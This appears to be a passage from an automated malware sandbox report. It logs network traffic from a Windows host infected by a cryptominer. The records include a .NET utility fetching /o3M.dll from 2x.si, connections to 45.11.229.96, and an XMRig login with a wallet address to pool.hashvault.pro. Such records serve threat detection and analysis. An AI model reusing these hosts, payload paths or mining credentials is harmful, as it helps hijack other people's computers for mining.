Sep 19, 2024 02:29:08.774441004 CEST	49993	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:08.774504900 CEST	49993	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:08.779237986 CEST	39001	49993	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:08.888351917 CEST	49994	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:08.893855095 CEST	39001	49994	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:08.898371935 CEST	49994	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:09.226433992 CEST	49994	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:09.231482983 CEST	39001	49994	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:09.231564045 CEST	49994	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:09.236325026 CEST	39001	49994	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:09.543083906 CEST	39001	49994	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:09.543277979 CEST	49994	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:09.543277979 CEST	49994	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:09.548079014 CEST	39001	49994	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:09.653924942 CEST	49995	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:09.658982038 CEST	39001	49995	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:09.659087896 CEST	49995	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:09.687566996 CEST	49995	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:09.692291021 CEST	39001	49995	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:09.692372084 CEST	49995	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:09.697125912 CEST	39001	49995	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:10.331372023 CEST	39001	49995	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:10.334454060 CEST	49995	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:10.359318018 CEST	49995	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:10.364108086 CEST	39001	49995	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:10.830162048 CEST	49996	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:10.835097075 CEST	39001	49996	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:10.835171938 CEST	49996	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:12.092040062 CEST	49996	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:12.096920013 CEST	39001	49996	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:12.096990108 CEST	49996	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:12.101778030 CEST	39001	49996	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:12.422671080 CEST	39001	49996	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:12.422804117 CEST	49996	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:12.422890902 CEST	49996	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:12.427659988 CEST	39001	49996	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:12.528790951 CEST	49997	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:12.533704042 CEST	39001	49997	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:12.533792973 CEST	49997	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:12.556406975 CEST	49997	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:12.561198950 CEST	39001	49997	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:12.561275005 CEST	49997	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:12.566082001 CEST	39001	49997	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:13.190648079 CEST	39001	49997	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:13.190742970 CEST	49997	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:13.190944910 CEST	49997	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:29:13.195831060 CEST	39001	49997	45.11.229.96	192.168.2.5
Sep 19, 2024 02:29:29.304255009 CEST	80	49718	45.76.89.70	192.168.2.5
Sep 19, 2024 02:29:29.356241941 CEST	49718	80	192.168.2.5	45.76.89.70

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 19, 2024 02:25:14.843966007 CEST	52764	53	192.168.2.5	1.1.1.1
Sep 19, 2024 02:25:14.903078079 CEST	53	52764	1.1.1.1	192.168.2.5
Sep 19, 2024 02:25:15.815649033 CEST	58037	53	192.168.2.5	1.1.1.1
Sep 19, 2024 02:25:15.837434053 CEST	53	58037	1.1.1.1	192.168.2.5
Sep 19, 2024 02:25:23.498853922 CEST	59539	53	192.168.2.5	1.1.1.1
Sep 19, 2024 02:25:23.506077051 CEST	53	59539	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 19, 2024 02:25:14.843966007 CEST	192.168.2.5	1.1.1.1	0x6c14	Standard query (0)	strompreis.ru	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:25:15.815649033 CEST	192.168.2.5	1.1.1.1	0x2b52	Standard query (0)	2x.si	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:25:23.498853922 CEST	192.168.2.5	1.1.1.1	0xaeb6	Standard query (0)	pool.hashvault.pro	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 19, 2024 02:25:14.903078079 CEST	1.1.1.1	192.168.2.5	0x6c14	No error (0)	strompreis.ru	45.11.229.96	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:25:15.837434053 CEST	1.1.1.1	192.168.2.5	0x2b52	No error (0)	2x.si	172.67.143.156	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:25:15.837434053 CEST	1.1.1.1	192.168.2.5	0x2b52	No error (0)	2x.si	104.21.27.222	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:25:23.506077051 CEST	1.1.1.1	192.168.2.5	0xaeb6	No error (0)	pool.hashvault.pro	95.179.241.203	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:25:23.506077051 CEST	1.1.1.1	192.168.2.5	0xaeb6	No error (0)	pool.hashvault.pro	45.76.89.70	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

2x.si

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49718	45.76.89.70	80	5808	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

Timestamp	Bytes transferred	Direction	Data
Sep 19, 2024 02:25:23.512944937 CEST	568	OUT	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 33 69 39 58 71 65 62 44 69 36 63 58 56 31 41 45 44 4c 77 62 4a Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU","pass":"x","agent":"XMRig/6.21.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 ms
Sep 19, 2024 02:25:24.168541908 CEST	731	IN	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 32 33 35 32 63 63 61 30 2d 30 30 63 35 2d 34 64 39 64 2d 62 63 62 64 2d 61 30 61 31 36 Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"2352cca0-00c5-4d9d-bcbd-a0a16be55b4b","job":{"blob":"1010e8deadb706fb6cab1d5e1988ea2965fa575de244d13ddb667d5bb8ee0cab7519871f8af57800000000f0cfb15746b2c2e67e3b1fa5248aed28c5390a05e0727c978f8
Sep 19, 2024 02:25:35.143028021 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 65 64 65 61 64 62 37 30 36 66 62 36 63 61 62 31 64 35 65 31 39 38 38 65 61 32 39 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010fedeadb706fb6cab1d5e1988ea2965fa575de244d13ddb667d5bb8ee0cab7519871f8af57800000000e2d1efac5718d8a22a1a914612a424d260c2b57577605551718cd7ee98ff4c2f1c","job_id":"b0bc947f-69d9-4e53-98ac-0bd62
Sep 19, 2024 02:25:49.505141020 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 64 64 66 61 64 62 37 30 36 37 37 64 64 38 64 62 31 62 31 65 30 38 37 61 38 39 65 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"10108ddfadb70677dd8db1b1e087a89e2094e2f6a252cc0804c00df0e52bb27c8268bd580a629d00000000b103456fca48bdec01e270160b1be787bd0fb2c08ef4c9bfd0f9c0b040db7bf60a","job_id":"0a729365-5a23-4745-86c9-2a386
Sep 19, 2024 02:26:11.347749949 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 32 64 66 61 64 62 37 30 36 37 37 64 64 38 64 62 31 62 31 65 30 38 37 61 38 39 65 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a2dfadb70677dd8db1b1e087a89e2094e2f6a252cc0804c00df0e52bb27c8268bd580a629d00000000ba74f4576de654f990b378154ab391a3bac70ef5d1ceda4e7a86b5f36393517e0e","job_id":"1ed0e811-6193-42cb-a042-ac349
Sep 19, 2024 02:26:12.545464039 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 34 64 66 61 64 62 37 30 36 32 62 62 30 34 65 39 35 31 66 61 30 30 61 37 61 36 65 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a4dfadb7062bb04e951fa00a7a6ea929eb6d941636093dd9afe6ce2cd3ba384f090cf8ca8100000000135406294219a9ce7d3aca4072e24b67548d042e842440eb4a85a1a1f181a52802","job_id":"fe018b94-8e93-467f-9754-ef3ca
Sep 19, 2024 02:26:33.192766905 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 38 64 66 61 64 62 37 30 36 32 62 62 30 34 65 39 35 31 66 61 30 30 61 37 61 36 65 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010b8dfadb7062bb04e951fa00a7a6ea929eb6d941636093dd9afe6ce2cd3ba384f090cf8ca81000000007b242eb2e4e8adbdb0df600e5ea3519408febee92358ea0899b19567e85eeef010","job_id":"df4b5cc0-2988-41b6-ad0b-f7c0d
Sep 19, 2024 02:26:55.560619116 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 65 64 66 61 64 62 37 30 36 32 62 62 30 34 65 39 35 31 66 61 30 30 61 37 61 36 65 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010cedfadb7062bb04e951fa00a7a6ea929eb6d941636093dd9afe6ce2cd3ba384f090cf8ca81000000002bfbd76ec2d86a89e577038768531ab2bc2171fcb34859a49c71e444ed4b32572a","job_id":"1b661dd2-9b90-4389-a5d0-41963
Sep 19, 2024 02:26:55.579083920 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 65 64 66 61 64 62 37 30 36 32 62 62 30 34 65 39 35 31 66 61 30 30 61 37 61 36 65 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010cedfadb7062bb04e951fa00a7a6ea929eb6d941636093dd9afe6ce2cd3ba384f090cf8ca81000000002bfbd76ec2d86a89e577038768531ab2bc2171fcb34859a49c71e444ed4b32572a","job_id":"1b661dd2-9b90-4389-a5d0-41963
Sep 19, 2024 02:27:01.101716042 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 65 64 66 61 64 62 37 30 36 32 62 62 30 34 65 39 35 31 66 61 30 30 61 37 61 36 65 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010cedfadb7062bb04e951fa00a7a6ea929eb6d941636093dd9afe6ce2cd3ba384f090cf8ca810000000032b5fc61a5be0551531ef325b9f1c7488b2e56d47b082318fc3584a193e655aa2a","job_id":"723c1880-3aae-4ad8-96b3-bb007

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49709	172.67.143.156	443	6044	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-19 00:25:16 UTC	62	OUT	GET /o3M.dll HTTP/1.1 Host: 2x.si Connection: Keep-Alive
2024-09-19 00:25:16 UTC	662	IN	HTTP/1.1 200 OK Date: Thu, 19 Sep 2024 00:25:16 GMT Content-Type: application/octet-stream Content-Length: 2355928 Connection: close accept-ranges: bytes etag: "666e0473-23f2d8" last-modified: Sat, 15 Jun 2024 21:15:31 GMT CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C3PI%2FYeapv4hduTAIVUiIfpO8tVG65ExNfLVYxkWCi40lzvPt9%2FwBuxIVL3syK%2BcETbTga%2FgRYcR2%2Bse77mwn7ELcViPDO53%2B7I93ooSbAzeuy54rQ%2F1hA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c5570068fe0191e-EWR alt-svc: h3=":443"; ma=86400
2024-09-19 00:25:16 UTC	707	IN	Data Raw: 6b 80 b9 56 59 d2 3d 4b 33 f2 eb 9b 13 69 f9 b4 3e f9 75 8c 7c 7a df b4 7e 51 90 77 e7 9a 50 12 45 12 c5 cc d3 3a 30 2c ea 41 a7 34 e0 4a ac 94 6b 94 53 09 ae ca cc ac 10 ce 0e 21 e5 0d b3 44 d8 de f9 f4 97 cc 3b 4c 9a 85 d7 f9 25 48 b9 13 8e 85 71 b3 8a b6 00 ed eb a0 b4 d0 61 1d e6 4d 93 87 02 73 3b 7f d1 0b 22 9a f6 79 55 0e 38 d2 15 99 00 2b 08 ab e4 94 83 06 d7 e3 b5 dc e7 e8 e2 5e ee 81 df 27 32 b5 92 87 87 d3 49 c4 13 a7 a8 98 25 b8 aa f0 9e 50 69 e4 d6 49 6b 86 c7 58 36 3a f2 b8 dd f0 22 33 3d df 85 a8 0e 07 11 77 3e 70 4c d7 68 12 94 76 27 ab 8d 8c f1 34 fe 88 95 8a d8 f4 bd d4 84 1c dc 3e 2b a7 94 48 bb ee cc 47 54 a9 fb 53 22 7f 62 db 69 03 7a a4 9d 88 56 55 84 d8 67 4f b9 44 8d 95 ac 75 8c da d9 c2 dc 2a d4 9c b8 b9 ac 17 82 50 13 fb a0 65 05 Data Ascii: kVY=K3i>u\|z~QwPE:0,A4JkS!D;L%HqaMs;"yU8+^'2I%PiIkX6:"3=w>pLhv'4>+HGTS"bizVUgODu*Pe
2024-09-19 00:25:16 UTC	1369	IN	Data Raw: 5b ca 06 c4 59 91 20 ad d4 70 24 f3 2c 66 15 c1 59 7a 02 61 c6 fe 16 8d bb d7 f8 9c c6 3e 19 63 21 81 29 bf 74 0c 1a 50 61 8d e8 cd 4e fe 6b 27 88 27 bd 36 b8 dd 76 c7 a3 5c 11 3f 20 fe 93 4e b8 60 04 c6 7e 98 59 60 5f 41 c5 14 a4 e2 7a 97 8b 19 c2 b7 55 52 31 cc c7 43 f8 5b a5 55 ef 5a cd ce 00 d9 bd 55 3d 56 12 78 a8 46 ef 97 64 cd 81 ec bf 7a 14 e5 b7 74 a6 6c 08 a9 70 3a f0 45 5d fa 01 f1 d4 b8 5b d3 9d 15 b3 dd a2 3c c7 be 4a 26 47 70 5c 3f b5 b3 9f 14 e5 9b 6e 3f 39 6a 64 e2 4d 81 52 41 28 e2 12 8b 75 88 82 c3 96 56 9c ed 2e e2 9e 77 46 d2 82 0a f6 c9 ae 08 55 c8 01 60 b9 14 32 d4 b2 51 ab c8 ba 55 7f 03 9c 57 c4 cc 31 3b cd c4 f9 56 07 28 2b a5 9c 74 4a b7 9c 46 28 8b ed d3 4e d8 46 46 50 fe 1d 05 5e 96 a6 78 b2 52 2b db f6 c4 d4 6a 01 e7 cf 00 30 Data Ascii: [Y p$,fYza>c!)tPaNk''6v\? N`~Y`_AzUR1C[UZU=VxFdztlp:E][<J&Gp\?n?9jdMRA(uV.wFU`2QUW1;V(+tJF(NFFP^xR+j0
2024-09-19 00:25:16 UTC	1369	IN	Data Raw: ba 03 05 a5 c5 e9 9e d6 80 8a 17 c7 63 c3 14 5b a6 ae 79 32 8b 5c a5 9d a1 71 ce 07 33 03 c0 f3 ae 03 cd 70 6d 8c d1 d5 18 1f ad 49 1f c4 1e 7d c3 dc 59 80 ea a0 d2 c5 4a b0 ff b9 e9 f7 f4 36 2b 2c 0e 3a 24 28 55 72 70 d7 38 0f 18 df 8a 08 03 26 17 e8 d4 72 fa e0 ce 4b 31 9d c0 64 b1 7c dc 51 9e 7f 65 bc 26 cb 04 43 a3 ca 8d a5 7c a8 9e a7 ed 9a 7c 63 2d 94 d7 3e e0 8e 68 78 d5 8d 4b ec e3 ad 3a 59 50 6d 2c 4f 17 72 88 90 d9 b3 6c cf c1 67 98 5f 10 50 d1 b2 5a 50 6f 9a 9f 2b 6a b7 40 65 cb eb db 46 c4 4c 76 d3 3a e4 19 47 83 6c 71 3d f7 af 0c dc f7 af 03 14 42 d4 33 cc 5b 74 74 4f 42 4e 49 0d c3 3e fe 88 c7 02 b0 49 e4 6b cd 78 43 b7 20 61 82 14 89 db 92 63 dc 38 0a bb 9b 2e 33 23 1a f9 43 62 7c 5d fd 0e 85 4c d8 63 56 61 28 94 89 03 8d 34 48 71 49 d2 54 Data Ascii: c[y2\q3pmI}YJ6+,:$(Urp8&rK1d\|Qe&C\|\|c->hxK:YPm,Orlg_PZPo+j@eFLv:Glq=B3[ttOBNI>IkxC ac8.3#Cb\|]LcVa(4HqIT
2024-09-19 00:25:16 UTC	651	IN	Data Raw: a4 75 da d4 7f f5 d6 42 e3 2c 79 49 1e 5f a5 e9 a9 9f 85 f1 89 3b 33 9c 6b fb de df f1 9d 0d b1 b0 5c 3f 1b 85 bc 6f 15 80 a8 6c ef a0 4f 85 27 58 06 1f 99 fb 7b 8b 6a cd 3b 48 39 51 5a fd d2 5a 7e 79 fe 7f 72 70 ac 50 4f c0 90 79 2e b8 30 2d 58 2e d5 e3 ab 13 9d 1a b2 da 68 d4 fb 58 2e ba cd e2 2f 27 51 9c 79 d0 78 8a 02 ea c0 42 af 4a 2e 45 2f e3 08 33 41 f1 25 29 a1 2a d8 45 1e 84 6c e2 95 ae 3e c5 39 86 b9 ac eb aa ff 2d ee a2 55 cf 5d 39 e8 2c ab 25 98 86 69 42 d4 51 6b da fd 79 e0 4e df 54 e2 4c 5b ed d8 79 a6 c9 ce 97 9a 49 30 fb 7c 3e 80 61 3b aa 38 a6 f4 88 86 93 de 18 35 0f 5b b6 66 c5 31 a3 70 3d 35 be 8e 30 98 4c 48 bb b0 4a ac ad 48 4f a6 a0 f5 d7 04 c6 5f 4a eb 46 a5 5f 48 53 65 b7 42 46 68 4b a5 aa 9e b5 3f 8b 05 e1 98 65 89 dd 47 87 2f 6f Data Ascii: uB,yI_;3k\?olO'X{j;H9QZZ~yrpPOy.0-X.hX./'QyxBJ.E/3A%)*El>9-U]9,%iBQkyNTL[yI0\|>a;85[f1p=50LHJHO_JF_HSeBFhK?eG/o
2024-09-19 00:25:16 UTC	1369	IN	Data Raw: 6d db 7c ac ff ae 48 73 3e 6f f8 c6 66 ad 75 ba 47 16 e5 c6 bb b9 4c bf c6 5d 9e 24 16 02 89 10 ca 71 a2 d6 5d 8e 30 47 02 49 b6 f7 6b 82 59 46 94 8e 88 5a ac 35 1a df 91 24 8b f0 b0 5d fe 0a 11 6e ec 3f 7a ca 2d ac cc f3 f5 dc 45 71 63 b9 aa ae e9 9e f8 ef f5 2c 48 c5 60 67 8a e3 fa 93 c5 b5 03 42 8e 39 cc 21 6d d2 8b 57 31 79 e9 9d 5c 2f ff eb c5 41 b2 0d 5d 2a 4d 7f a3 b4 40 52 ec 47 40 8c ee e3 ea 9c 6a 1b 91 15 e1 d6 6d c6 0c 53 fb 22 78 a4 d4 65 0d ba e5 f2 86 02 2d 12 f0 e6 6e f6 82 a3 cd 32 1c 09 f4 28 d8 61 6f 1e c6 5c 1e 41 46 fb 4d 84 d2 3c 62 50 96 c1 56 60 b0 ac 0a c3 1d 62 c7 9d f8 db bf 9b 6a b7 d5 62 0e 9f df e1 05 3b b0 36 8e 60 50 a3 e4 ad 9d 16 88 2f c9 f7 41 46 26 17 71 e9 05 66 13 99 13 b1 66 90 ee b2 b4 c0 d5 22 28 ef 18 44 14 d2 75 Data Ascii: m\|Hs>ofuGL]$q]0GIkYFZ5$]n?z-Eqc,H`gB9!mW1y\/A]*M@RG@jmS"xe-n2(ao\AFM<bPV`bjb;6`P/AF&qff"(Du
2024-09-19 00:25:16 UTC	1369	IN	Data Raw: c0 36 76 db 9c 55 cc e8 15 9b a3 4b 6c 5c 53 56 d5 75 5c f3 02 5f 8a c5 c8 d6 59 47 62 84 cb 22 1d 57 01 f7 da c0 a8 a8 57 ab 11 0c ad 4d 61 c2 76 0b 92 21 74 f8 bb ec 1c 6c 4b 0c 1f ec 9b d2 9a 03 83 5b 68 94 0c 4c dc 4b 3f 38 8a e9 fe c2 9b 84 3c 35 1e 20 19 ce ce 08 d4 a0 de c1 5f 8b 5b 4f 25 a8 86 86 26 ec 10 f7 2f 86 33 6c 64 d6 69 89 c3 a4 06 25 5c a1 a6 99 e5 01 79 bc eb 29 46 20 35 e4 fb fc 8f ab ab 2d ab 52 a1 1e 49 cc c2 e7 66 e1 48 b4 17 b3 0b dd 39 4f e8 4d 7e 1a d0 85 d4 d9 37 6c 28 e9 28 06 4a 5a d0 d3 92 d2 f0 dd c8 a6 1b 63 bd 97 64 40 57 9c 9c cc 96 f3 50 ce 9a 06 9d 68 29 4e a0 75 50 bc 23 23 a1 2b 3f fd 63 10 5b df c7 e3 13 c9 ae 99 64 62 d6 3e a3 3d c2 9c e1 f5 9c 44 cd 01 cd ab 96 3c 13 52 f2 17 39 a7 67 ed 23 d3 ef 33 b7 04 b1 bf d1 Data Ascii: 6vUKl\SVu\_YGb"WWMav!tlK[hLK?8<5 _[O%&/3ldi%\y)F 5-RIfH9OM~7l((JZcd@WPh)NuP##+?c[db>=D<R9g#3
2024-09-19 00:25:16 UTC	1358	IN	Data Raw: a4 95 42 89 07 6b bd c8 4a 07 db 8d e9 09 ef 09 97 d4 cf 47 a2 db c4 dc 16 a6 87 48 9e b2 92 c3 99 39 1f 9b d3 21 7d 16 11 23 f6 1b ce 3f 28 e2 93 84 ef 23 de 20 7f f5 4b d7 29 25 a4 2d 47 9d d5 9f db 89 57 22 c2 0b 73 40 a2 92 b9 bb e6 b9 4a 75 dd 13 63 86 3c 09 ca fc e3 d1 52 3d 23 d9 47 7c 7f a1 61 0a 88 0f 12 d7 7d 9e 2b 12 18 2a 39 a5 d6 76 15 b8 d8 b6 ac 0c dc 86 05 f9 e5 06 2b 5f 9a c1 f0 c2 05 99 84 58 80 09 12 2f 7f d2 2b 77 68 5e 4b 50 38 e9 0d b9 30 86 c7 cd 06 02 c9 f6 b0 35 fa 07 db 54 18 2f 99 7f d4 f9 a9 ee 36 1a c4 c2 7b 8a 85 7c 49 93 41 1d c1 22 ac dd 00 5a 8e e2 31 bf 8a 95 3c 6c 39 07 fe e6 1c b2 2a ed f3 c8 5c de 64 a6 c0 72 2a b3 17 e0 cf e9 39 1b fb b9 22 7b 5a 15 85 4a 07 1b 90 84 71 ba 19 d5 96 74 7a 1b 18 59 f7 b8 8b 9e 92 da a3 Data Ascii: BkJGH9!}#?(# K)%-GW"s@Juc<R=#G\|a}+9v+_X/+wh^KP805T/6{\|IA"Z1<l9\dr*9"{ZJqtzY
2024-09-19 00:25:16 UTC	1369	IN	Data Raw: a7 d2 2f e2 38 e1 fa 0c a9 db 2e 99 87 bd fc 11 9b eb c6 e2 3c ed bc 71 5e 5f cf 5e 68 cf 90 5f 26 8f 52 e1 6e af 8e 5f a9 15 a5 d9 f6 c1 5b 35 0a e0 d4 01 85 64 81 30 84 3b a4 01 62 4e db 45 29 f8 31 0a d1 e8 49 ae 83 30 6d d2 64 90 69 b2 84 55 16 92 b4 6e bd 88 66 bb 77 17 1e 20 c1 76 70 af c8 06 4a a8 b9 d4 c6 e5 e5 9e 99 b4 61 07 d7 82 ae a5 f4 f3 3a e7 29 e9 24 63 e8 1e 98 b4 b0 2b c4 65 d4 22 2b 83 24 a0 bb 85 57 18 67 d7 ea 28 a8 98 59 06 8d 7f 95 4c 6e cd 0e db bc f5 db e0 27 c1 4d f8 85 47 f8 29 04 54 70 56 aa ce 6b 5b 21 ca da 08 0c e9 ea 60 3d 27 c3 5d 33 b3 78 ae ea b6 38 38 00 cb 9b 34 2f a8 e1 9b 82 ad 91 fe 66 da df 9e 43 b3 b2 57 64 f5 2d 01 cd e8 c7 18 77 db b5 0b 00 f8 e5 05 5d 0d 47 8a db d1 cd be 76 2e d3 0b 0b 89 59 14 22 a5 3c b9 c2 Data Ascii: /8.<q^_^h_&Rn_[5d0;bNE)1I0mdiUnfw vpJa:)$c+e"+$Wg(YLn'MG)TpVk[!`=']3x884/fCWd-w]Gv.Y"<
2024-09-19 00:25:16 UTC	1369	IN	Data Raw: f4 8c 9d e5 0e c2 bf db a5 0f 19 03 cf ee f5 ee 40 ae aa e5 e9 6d 31 fb 7a 63 bd eb 39 98 c5 73 ee bd 2f 73 5f 05 22 fd 82 1d 48 12 43 59 28 8c e4 be a6 19 2c 59 dd 26 9b 01 9f 06 4e cf 61 18 eb 51 55 3b 20 20 1b 46 14 97 97 99 c3 c0 61 b2 cd 83 d6 a1 d6 8c 16 ff 5d 45 f7 c3 40 9c 8e 77 a7 42 c9 1d 6a 01 10 c6 a6 df 26 c1 43 03 4f d5 cb fb 5e 50 a2 e9 e6 27 92 eb cb 46 60 1a ee 05 2e 0e 4b 6d 9f 65 05 40 ae d1 b0 37 9f 50 6e ce c3 41 69 7f fa ec 1d 52 c9 6e 66 c2 10 c5 2a 2e 01 ba 94 15 9f 8f b9 01 0e ee 87 5f e3 68 8f 9c 22 ba a0 2e 11 28 ba 81 db e7 a0 e3 a8 23 bb a9 b3 7f 20 76 e7 df 7a 2e 99 ac dd 9b d8 16 4e f0 04 20 e1 f0 1a fb a7 fd 4b 8b bd cb ef a8 95 ec cb 53 9d c1 9f af 9d a5 37 b9 80 d4 7d 6e f1 c7 0c 7b 4c a5 4f 70 c4 e8 29 e9 26 04 f4 45 56 Data Ascii: @m1zc9s/s_"HCY(,Y&NaQU; Fa]E@wBj&CO^P'F`.Kme@7PnAiRnf*._h".(# vz.N KS7}n{LOp)&EV
